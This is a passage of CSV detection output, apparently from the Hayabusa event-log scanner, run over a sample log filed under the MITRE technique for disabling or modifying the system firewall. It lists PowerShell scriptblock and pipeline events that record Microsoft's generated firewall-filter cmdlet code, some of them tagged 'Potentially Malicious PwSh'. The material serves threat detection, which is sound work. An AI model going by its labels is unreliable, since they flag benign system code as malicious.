$InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.026 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.027 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.027 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.027 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.028 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.075 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.075 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.076 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.076 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.077 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.078 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.110 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.111 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.112 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.112 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.142 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' -Alias '*' function 